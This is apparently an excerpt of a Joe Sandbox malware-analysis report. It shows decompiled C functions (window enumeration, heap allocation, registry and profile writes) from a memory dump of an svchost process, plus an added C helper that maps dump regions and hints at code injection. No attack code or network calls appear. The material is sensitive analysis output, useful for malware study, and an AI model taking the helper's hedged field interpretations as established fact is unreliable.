    0x004125fa
    0x00412613
    0x00000000
    0x00412615
    0x00412615
    0x0041261b
    0x00412621
    0x0041262a
    0x0041263b
    0x0041264e
    0x0041265a
    0x0041265a
    0x0041266a
    0x0041266a
    0x00412613
    0x004125ed
    0x004125d8

    APIs
    • StartPage.GDI32(?), ref: 004125E5
    • EndPage.GDI32(?), ref: 0041260B
      • Part of subcall function 0041EF10: wsprintfA.USER32 ref: 0041EF1F
      • Part of subcall function 0048754F: SetWindowTextA.USER32(?,004212EA), ref: 0048755D
    • UpdateWindow.USER32(?), ref: 0041265A
    • EndPage.GDI32(?), ref: 00412672
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Page$Window$StartTextUpdatewsprintf
    • String ID:
    • API String ID: 104827578-0
    • Opcode ID: 44cec65270ae8c177933e563ac315670e623aa8e0cdb22bd971afd91c16a9933
    • Instruction ID: 8d49f5fdef177c773c2a6bc3049d2e228969864625704c36bfdb14e9ce8d3118
    • Opcode Fuzzy Hash: 44cec65270ae8c177933e563ac315670e623aa8e0cdb22bd971afd91c16a9933
    • Instruction Fuzzy Hash: F2216571601B009BC7259B3ACD44ADBB7E5EFC4704F14882EE59FC6251E674A445CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 24%
    			E0048CB55(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
    				signed int _v8;
    				void* _t31;
    				intOrPtr _t34;
    				long* _t39;
    				intOrPtr* _t44;
    				signed int _t47;
    				long* _t48;
    				intOrPtr* _t51;
    
    				_push(__ecx);
    				_t51 = _a4;
    				_t39 = __ecx;
    				_t47 = 1;
    				_v8 = _t47;
    				if( *((intOrPtr*)(_t51 + 8)) <= _t47) {
    					L10:
    					_t48 =  &(_t39[7]);
    					 *0x49224c(_t48);
    					E0048C7CF( &(_t39[5]), _t51);
    					 *0x492250(_t48);
    					LocalFree( *(_t51 + 0xc));
    					if(_t51 != 0) {
    						 *((intOrPtr*)( *_t51))(1);
    					}
    					_t31 = TlsSetValue( *_t39, 0);
    					L13:
    					return _t31;
    				} else {
    					goto L1;
    				}
    				do {
    					L1:
    					_t34 = _a8;
    					if(_t34 == 0 ||  *((intOrPtr*)(_t39[4] + 4 + _t47 * 8)) == _t34) {
    						_t44 =  *((intOrPtr*)( *(_t51 + 0xc) + _t47 * 4));
    						if(_t44 != 0) {
    							 *((intOrPtr*)( *_t44))(1);
    						}
    						_t31 =  *(_t51 + 0xc);
    						 *(_t31 + _t47 * 4) =  *(_t31 + _t47 * 4) & 0x00000000;
    					} else {
    						_t31 =  *(_t51 + 0xc);
    						if( *(_t31 + _t47 * 4) != 0) {
    							_v8 = _v8 & 0x00000000;
    						}
    					}
    					_t47 = _t47 + 1;
    				} while (_t47 <  *((intOrPtr*)(_t51 + 8)));
    				if(_v8 == 0) {
    					goto L13;
    				}
    				goto L10;
    			}

    0x0048cb58
    0x0048cb5b
    0x0048cb61
    0x0048cb63
    0x0048cb67
    0x0048cb6a
    0x0048cbae
    0x0048cbae
    0x0048cbb2
    0x0048cbbc
    0x0048cbc2
    0x0048cbcb
    0x0048cbd3
    0x0048cbdb
    0x0048cbdb
    0x0048cbe1
    0x0048cbe7
    0x0048cbeb
    0x00000000
    0x00000000
    0x00000000
    0x0048cb6c
    0x0048cb6c
    0x0048cb6c
    0x0048cb71
    0x0048cb8e
    0x0048cb93
    0x0048cb99
    0x0048cb99
    0x0048cb9b
    0x0048cb9e
    0x0048cb7c
    0x0048cb7c
    0x0048cb83
    0x0048cb85
    0x0048cb85
    0x0048cb83
    0x0048cba2
    0x0048cba3
    0x0048cbac
    0x00000000
    0x00000000
    0x00000000

    APIs
    • RtlEnterCriticalSection.NTDLL(?), ref: 0048CBB2
    • RtlLeaveCriticalSection.NTDLL(?), ref: 0048CBC2
    • LocalFree.KERNEL32(?), ref: 0048CBCB
    • TlsSetValue.KERNEL32(?,00000000), ref: 0048CBE1
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CriticalSection$EnterFreeLeaveLocalValue
    • String ID:
    • API String ID: 2949335588-0
    • Opcode ID: 9a69ea20fbf7c2507d09341e4d7991d8e478e7cc6493a8661130b3bccb61907b
    • Instruction ID: 25f1ff0c61a8e3ad97143760a33ba726e8c87612978cfa0bfc94653251366302
    • Opcode Fuzzy Hash: 9a69ea20fbf7c2507d09341e4d7991d8e478e7cc6493a8661130b3bccb61907b
    • Instruction Fuzzy Hash: ED219A31201A00EFD725AF54E8C6F6E77A4FF84711F00886EE5428B2A1C7B9F841CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00414500(void* __ecx, struct HWND__* _a4) {
    				struct HWND__* _t5;
    				struct HWND__* _t7;
    				void* _t10;
    				void* _t20;
    				struct HWND__* _t21;
    
    				_t5 = _a4;
    				_t20 = __ecx;
    				if(_t5 == 0) {
    					L10:
    					return _t5;
    				}
    				_t5 = GetTopWindow(_t5);
    				_t21 = _t5;
    				if(_t21 == 0) {
    					goto L10;
    				}
    				do {
    					if(E00414340(_t20, _t21, 0) != 0xffffffff) {
    						_t10 = E00418A40(0x3ea,  *((intOrPtr*)(E004135B0(_t20 + 0x14, _t6, 0))), 0);
    						if(_t10 != 0 && ( *(_t10 + 0x14) & 0x00000004) != 0 && SendMessageA(_t21, 0xf0, 0, 0) != 0) {
    							SendMessageA(_t21, 0xf1, 0, 0);
    						}
    					}
    					_t7 = GetWindow(_t21, 2);
    					_t21 = _t7;
    				} while (_t21 != 0);
    				return _t7;
    			}

    0x00414500
    0x00414506
    0x0041450a
    0x00414587
    0x00414587
    0x00414587
    0x0041450d
    0x00414513
    0x00414517
    0x00000000
    0x00000000
    0x00414527
    0x00414534
    0x0041454b
    0x00414552
    0x00414576
    0x00414576
    0x00414552
    0x0041457b
    0x0041457d
    0x0041457f
    0x00000000

    APIs
    • GetTopWindow.USER32(?), ref: 0041450D
      • Part of subcall function 00414340: IsChild.USER32(?,?), ref: 004143BD
      • Part of subcall function 00414340: GetParent.USER32(?), ref: 004143D7
    • SendMessageA.USER32(00000000,000000F0,00000000,00000000), ref: 00414566
    • SendMessageA.USER32(00000000,000000F1,00000000,00000000), ref: 00414576
    • GetWindow.USER32(00000000,00000002), ref: 0041457B
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: MessageSendWindow$ChildParent
    • String ID:
    • API String ID: 1043810220-0
    • Opcode ID: 2026899e5a2a366cb5344a0a64e87c292c1dfc17ac4a8e64f5e90b1653b16cd7
    • Instruction ID: 3b53422f05a903dfff9b6eb4f1596fe668536504e091219a3006d073657e5b04
    • Opcode Fuzzy Hash: 2026899e5a2a366cb5344a0a64e87c292c1dfc17ac4a8e64f5e90b1653b16cd7
    • Instruction Fuzzy Hash: A2017C317C171277E231962A9C96FEB725D5F91B61F150237BB00AB2D0DFA8ED8081AD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00478DBA() {
    				signed int _t15;
    				void* _t17;
    				void* _t19;
    				void* _t25;
    				signed int _t26;
    				void* _t27;
    				intOrPtr* _t29;
    
    				_t15 =  *0x4e1c7c; // 0x0
    				_t26 =  *0x4e1c6c; // 0x0
    				if(_t15 != _t26) {
    					L3:
    					_t27 =  *0x4e1c80; // 0x0
    					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
    					_t17 = RtlAllocateHeap( *0x4e1c88, 8, 0x41c4);
    					 *(_t29 + 0x10) = _t17;
    					if(_t17 == 0) {
    						L6:
    						return 0;
    					}
    					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4);
    					 *(_t29 + 0xc) = _t19;
    					if(_t19 != 0) {
    						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
    						 *_t29 = 0;
    						 *((intOrPtr*)(_t29 + 4)) = 0;
    						 *0x4e1c7c =  *0x4e1c7c + 1;
    						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
    						return _t29;
    					}
    					HeapFree( *0x4e1c88, 0,  *(_t29 + 0x10));
    					goto L6;
    				}
    				_t2 = _t26 * 4; // 0x50
    				_t25 = RtlReAllocateHeap( *0x4e1c88, 0,  *0x4e1c80, _t26 + _t2 + 0x50 << 2);
    				if(_t25 == 0) {
    					goto L6;
    				}
    				 *0x4e1c6c =  *0x4e1c6c + 0x10;
    				 *0x4e1c80 = _t25;
    				_t15 =  *0x4e1c7c; // 0x0
    				goto L3;
    			}

    0x00478dba
    0x00478dbf
    0x00478dcb
    0x00478dfd
    0x00478dfd
    0x00478e13
    0x00478e16
    0x00478e1e
    0x00478e21
    0x00478e4d
    0x00000000
    0x00478e4d
    0x00478e30
    0x00478e38
    0x00478e3b
    0x00478e51
    0x00478e55
    0x00478e57
    0x00478e5a
    0x00478e63
    0x00000000
    0x00478e66
    0x00478e47
    0x00000000
    0x00478e47
    0x00478dcd
    0x00478de2
    0x00478dea
    0x00000000
    0x00000000
    0x00478dec
    0x00478df3
    0x00478df8
    0x00000000

    APIs
    • RtlReAllocateHeap.NTDLL(00000000,00000050,?,00000000), ref: 00478DE2
    • RtlAllocateHeap.NTDLL(00000008,000041C4,?), ref: 00478E16
    • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00478E30
    • HeapFree.KERNEL32(00000000,?), ref: 00478E47
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Heap$Allocate$AllocFreeVirtual
    • String ID:
    • API String ID: 94566200-0
    • Opcode ID: a25f75e2514465c74ee0b873b0dcb2e4289e6a3ae309cab6364895ba1d936b1f
    • Instruction ID: 40fc2d426208af2c800c2e6c6e8c6ffcbf897bfd310906779b9e46beb2a16428
    • Opcode Fuzzy Hash: a25f75e2514465c74ee0b873b0dcb2e4289e6a3ae309cab6364895ba1d936b1f
    • Instruction Fuzzy Hash: 851130712C0241EFD7218F29ECC996A7BB5FB557507604A3EF165CA1B1CB70A852CF18
    Uniqueness

    Uniqueness Score: -1.00%
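The Memory Dump Source names in each entry identify the region a function was decompiled from. The following is an added example (editor-written C, not part of the Joe Sandbox report or of the sample) that parses those names and maps a code address from this page to its region. The field layout it assumes, <proc>.<pass>.<seq>.<base>.<protect>.<f6>.<type>.<f8>.sdmp, is inferred from the twelve names listed above and is not documented on this page; only the process index, base address, protection (read with the standard PAGE_* values from winnt.h) and region type (MEMORY_BASIC_INFORMATION.Type) are interpreted, and the two remaining fields are kept raw. Region sizes are not listed, so each region is assumed to extend to the next listed base.

```c
#include <stdio.h>
#include <string.h>

/* One memory-dump region, as named in the "Memory Dump Source" lists.
 * Assumed name layout (inferred from the names on this page, not documented
 * by Joe Sandbox here):
 *   <proc>.<pass>.<seq>.<base>.<protect>.<f6>.<type>.<f8>.sdmp
 * proc, base, protect and type are interpreted; f6 and f8 are kept raw. */
typedef struct {
    unsigned proc, pass;
    unsigned long long seq, base;
    unsigned protect, f6, type, f8;
} Region;

/* Parse one dump-file name. Returns 1 on success, 0 if it does not fit. */
int parse_sdmp(const char *name, Region *r) {
    size_t n = strlen(name);
    if (n < 5 || strcmp(name + n - 5, ".sdmp") != 0) return 0;
    return sscanf(name, "%8u.%8u.%llu.%16llx.%8x.%8x.%8x.%8x.sdmp",
                  &r->proc, &r->pass, &r->seq, &r->base,
                  &r->protect, &r->f6, &r->type, &r->f8) == 8;
}

/* Page-protection constants from <winnt.h>. */
const char *protect_name(unsigned p) {
    switch (p) {
    case 0x01: return "PAGE_NOACCESS";        case 0x02: return "PAGE_READONLY";
    case 0x04: return "PAGE_READWRITE";       case 0x08: return "PAGE_WRITECOPY";
    case 0x10: return "PAGE_EXECUTE";         case 0x20: return "PAGE_EXECUTE_READ";
    case 0x40: return "PAGE_EXECUTE_READWRITE"; case 0x80: return "PAGE_EXECUTE_WRITECOPY";
    default:   return "?";
    }
}

/* MEMORY_BASIC_INFORMATION.Type constants. */
const char *type_name(unsigned t) {
    switch (t) {
    case 0x20000:   return "MEM_PRIVATE";
    case 0x40000:   return "MEM_MAPPED";
    case 0x1000000: return "MEM_IMAGE";
    default:        return "?";
    }
}

/* The twelve names listed for process 7 (svchost) on this page, copied from
 * the Memory Dump Source block with the "Download File" link text removed. */
static const char *const SDMP_NAMES[] = {
    "00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp",
    "00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp",
};
#define N_SDMP (sizeof SDMP_NAMES / sizeof SDMP_NAMES[0])

/* Index of the region containing addr, or -1. Sizes are not on the page, so
 * the region with the greatest base <= addr wins, i.e. each region is assumed
 * to run up to the next listed base. */
int region_for(unsigned long long addr) {
    int best = -1;
    unsigned long long best_base = 0;
    for (size_t i = 0; i < N_SDMP; i++) {
        Region r;
        if (!parse_sdmp(SDMP_NAMES[i], &r)) continue;
        if (r.base <= addr && (best < 0 || r.base > best_base)) {
            best = (int)i;
            best_base = r.base;
        }
    }
    return best;
}

/* Accessors for the region containing addr: 0 / "?" when nothing matches. */
unsigned long long base_of(unsigned long long addr) {
    Region r; int i = region_for(addr);
    return (i >= 0 && parse_sdmp(SDMP_NAMES[i], &r)) ? r.base : 0;
}
const char *protect_of(unsigned long long addr) {
    Region r; int i = region_for(addr);
    return (i >= 0 && parse_sdmp(SDMP_NAMES[i], &r)) ? protect_name(r.protect) : "?";
}
const char *type_of(unsigned long long addr) {
    Region r; int i = region_for(addr);
    return (i >= 0 && parse_sdmp(SDMP_NAMES[i], &r)) ? type_name(r.type) : "?";
}

int main(void) {
    /* E00478DBA itself, the globals it touches, and an address below the image. */
    unsigned long long probes[] = { 0x478DBAULL, 0x4E1C7CULL, 0x3FFFFFULL };
    for (size_t i = 0; i < 3; i++)
        printf("%#llx -> base %#llx %s %s\n", probes[i], base_of(probes[i]),
               protect_of(probes[i]), type_of(probes[i]));
    return 0;
}
```

Run against the addresses on this page: E00478DBA at 0x00478DBA falls in the 0x401000 region (protect field 0x20, PAGE_EXECUTE_READ), while the globals it reads and writes at 0x4E1C6C..0x4E1C88 fall in the 0x4E1000 region, whose protect field is 0x40 (PAGE_EXECUTE_READWRITE). Under the assumed layout every region's type field is 0x20000 (MEM_PRIVATE) rather than MEM_IMAGE, which is consistent with a PE written into svchost by the injection the report's signatures flag rather than with a normally loaded image; treat that reading as conditional on the field interpretation stated above.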

    C-Code - Quality: 94%
    			E00482230(void* __ecx, struct tagPOINT* _a8) {
    				struct tagPOINT _v12;
    				struct tagPOINT* _t8;
    				struct HWND__* _t9;
    				int _t14;
    				intOrPtr _t18;
    				struct HWND__* _t21;
    				struct HWND__* _t22;
    				struct HWND__* _t24;
    
    				_t8 = _a8;
    				_v12.x =  *_t8;
    				_t18 =  *((intOrPtr*)(_t8 + 4));
    				_push(_t18);
    				_v12.y = _t18;
    				_t9 = WindowFromPoint( *_t8);
    				_t24 = _t9;
    				if(_t24 != 0) {
    					_t21 = GetParent(_t24);
    					if(_t21 == 0 || E0048A70B(_t21, 2) == 0) {
    						ScreenToClient(_t24,  &_v12);
    						_t22 = E0048A780(_t24, _v12.x, _v12.y);
    						if(_t22 == 0) {
    							L6:
    							_t9 = _t24;
    						} else {
    							_t14 = IsWindowEnabled(_t22);
    							_t9 = _t22;
    							if(_t14 != 0) {
    								goto L6;
    							}
    						}
    					} else {
    						_t9 = _t21;
    					}
    				}
    				return _t9;
    			}

    Instruction addresses for the decompiled statements above, in order: 0x00482235 0x0048223c 0x0048223f 0x00482242 0x00482243 0x00482248 0x0048224e 0x00482252 0x0048225b 0x0048225f 0x00482276 0x00482288 0x0048228c 0x0048229b 0x0048229b 0x0048228e 0x0048228f 0x00482297 0x00482299 0x00000000 0x00000000 0x00482299 0x0048226d 0x0048226d 0x0048226d 0x0048225f 0x004822a0

    APIs
    • WindowFromPoint.USER32(?,?), ref: 00482248
    • GetParent.USER32(00000000), ref: 00482255
    • ScreenToClient.USER32(00000000,?), ref: 00482276
    • IsWindowEnabled.USER32(00000000), ref: 0048228F
      • Part of subcall function 0048A70B: GetWindowLongA.USER32(00000000,000000F0), ref: 0048A71C
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: the same eleven dump regions (bases 0x400000 through 0x50A000) listed for E00478DBA above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$ClientEnabledFromLongParentPointScreen
    • String ID:
    • API String ID: 2204725058-0
    • Opcode ID: f8587a662c33b38dde11d865b38d0211dcb214c64353e07737c9007f452a0951
    • Instruction ID: a660a90db80995f9f3884b7d5d4cc6e97f1e7fa762f1e29824edec837ec7056f
    • Opcode Fuzzy Hash: f8587a662c33b38dde11d865b38d0211dcb214c64353e07737c9007f452a0951
    • Instruction Fuzzy Hash: 7401D436600510BF9702BB989E04CAF7BB9EF85700B14057AF904D3310DBB8CD01A7A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E004862EB(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
    				void* __ebp;
    				struct HWND__* _t10;
    				void* _t12;
    				void* _t15;
    				struct HWND__* _t17;
    				struct HWND__* _t18;
    				void* _t19;
    
    				_t15 = __ecx;
    				_t17 = GetDlgItem(_a4, _a8);
    				if(_t17 == 0) {
    					L6:
    					_t10 = GetTopWindow(_a4);
    					while(1) {
    						_t18 = _t10;
    						if(_t18 == 0) {
    							break;
    						}
    						_t12 = E004862EB(_t15, _t18, _a8, _a12);
    						if(_t12 == 0) {
    							_t10 = GetWindow(_t18, 2);
    							continue;
    						}
    						goto L11;
    					}
    					return 0;
    				} else {
    					if(GetTopWindow(_t17) == 0) {
    						L3:
    						_push(_t17);
    						if(_a12 == 0) {
    							return E00484C84(_t19);
    						}
    						_t12 = E00484CAB();
    						if(_t12 == 0) {
    							goto L6;
    						}
    					} else {
    						_t12 = E004862EB(_t15, _t17, _a8, _a12);
    						if(_t12 == 0) {
    							goto L3;
    						}
    					}
    				}
    				L11:
    				return _t12;
    			}

    Instruction addresses for the decompiled statements above, in order: 0x004862eb 0x00486302 0x00486306 0x00486336 0x00486339 0x0048633b 0x0048633b 0x0048633f 0x00000000 0x00000000 0x00486348 0x0048634f 0x00486354 0x00000000 0x00486354 0x00000000 0x0048634f 0x00000000 0x00486308 0x0048630d 0x0048631f 0x00486323 0x00486324 0x00000000 0x00486326 0x0048632d 0x00486334 0x00000000 0x00000000 0x0048630f 0x00486316 0x0048631d 0x00000000 0x00000000 0x0048631d 0x0048630d 0x00486361 0x00486361

    APIs
    • GetDlgItem.USER32(?,?), ref: 004862F6
    • GetTopWindow.USER32(00000000), ref: 00486309
    • GetTopWindow.USER32(?), ref: 00486339
    • GetWindow.USER32(00000000,00000002), ref: 00486354
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: the same eleven dump regions (bases 0x400000 through 0x50A000) listed for E00478DBA above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$Item
    • String ID:
    • API String ID: 369458955-0
    • Opcode ID: 0bd35543a12f95d67ae62ee11f00b210916aae7f3b22fd38440f457221d353ae
    • Instruction ID: e3163fbfbd5a25cdb38e2c0c4693c0e2a66b93898c248ca97732c6f68ae4b48b
    • Opcode Fuzzy Hash: 0bd35543a12f95d67ae62ee11f00b210916aae7f3b22fd38440f457221d353ae
    • Instruction Fuzzy Hash: A401A732401215B7CF623F659D09E9F3B5AAF50360F0A4837FD0092221D73AC921979D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E00486364(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
    				void* __ebp;
    				struct HWND__* _t16;
    				void* _t20;
    				void* _t22;
    				struct HWND__* _t24;
    
    				_t22 = __edx;
    				_t16 = GetTopWindow(_a4);
    				while(1) {
    					_t24 = _t16;
    					if(_t24 == 0) {
    						break;
    					}
    					if(_a24 == 0) {
    						SendMessageA(_t24, _a8, _a12, _a16);
    					} else {
    						_push(_t24);
    						_t20 = E00484CAB();
    						if(_t20 != 0) {
    							_push(_a16);
    							_push(_a12);
    							_push(_a8);
    							_push( *((intOrPtr*)(_t20 + 0x1c)));
    							_push(_t20);
    							E00484AB9(_t22);
    						}
    					}
    					if(_a20 != 0 && GetTopWindow(_t24) != 0) {
    						E00486364(_t22, _t24, _a8, _a12, _a16, _a20, _a24);
    					}
    					_t16 = GetWindow(_t24, 2);
    				}
    				return _t16;
    			}

    Instruction addresses for the decompiled statements above, in order: 0x00486364 0x00486372 0x00486374 0x00486374 0x00486378 0x00000000 0x00000000 0x0048637e 0x004863a8 0x00486380 0x00486380 0x00486381 0x00486388 0x0048638a 0x0048638d 0x00486390 0x00486393 0x00486396 0x00486397 0x00486397 0x00486388 0x004863b2 0x004863cb 0x004863cb 0x004863d3 0x004863d3 0x004863de

    APIs
    • GetTopWindow.USER32(?), ref: 00486372
    • SendMessageA.USER32(00000000,?,?,?), ref: 004863A8
    • GetTopWindow.USER32(00000000), ref: 004863B5
    • GetWindow.USER32(00000000,00000002), ref: 004863D3
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: the same eleven dump regions (bases 0x400000 through 0x50A000) listed for E00478DBA above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Window$MessageSend
    • String ID:
    • API String ID: 1496643700-0
    • Opcode ID: 9869f1ad92d6d31a5f006ee0701729fe18173bd2dd7b78f7386e45280a2c11db
    • Instruction ID: d6db060dfee8cc4bb89813d6d4a26f9ec472bced044f8d064611e0254a032a43
    • Opcode Fuzzy Hash: 9869f1ad92d6d31a5f006ee0701729fe18173bd2dd7b78f7386e45280a2c11db
    • Instruction Fuzzy Hash: E701483200161ABBCF526F91ED04EDF3B2AAF44350F064822FE00A1161C77AD971FBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0048B08D(void* __ecx, CHAR* _a4, CHAR* _a8, char _a12) {
    				char _v20;
    				void* _t17;
    				long _t19;
    				void* _t27;
    				void* _t28;
    
    				_t27 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
    					wsprintfA( &_v20, 0x49d29c, _a12);
    					return WritePrivateProfileStringA(_a4, _a8,  &_v20,  *(_t27 + 0x90));
    				}
    				_t17 = E0048DA44(__ecx, _a4);
    				_t28 = _t17;
    				if(_t28 != 0) {
    					_t19 = RegSetValueExA(_t28, _a8, 0, 4,  &_a12, 4);
    					RegCloseKey(_t28);
    					return 0 | _t19 == 0x00000000;
    				}
    				return _t17;
    			}

    Instruction addresses for the decompiled statements above, in order: 0x0048b094 0x0048b09a 0x0048b0de 0x00000000 0x0048b0f7 0x0048b09f 0x0048b0a4 0x0048b0a8 0x0048b0b9 0x0048b0c2 0x00000000 0x0048b0cf 0x0048b0ff

    APIs
    • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0048B0B9
    • RegCloseKey.ADVAPI32(00000000,?,?), ref: 0048B0C2
    • wsprintfA.USER32 ref: 0048B0DE
    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0048B0F7
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: the same eleven dump regions (bases 0x400000 through 0x50A000) listed for E00478DBA above
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ClosePrivateProfileStringValueWritewsprintf
    • String ID:
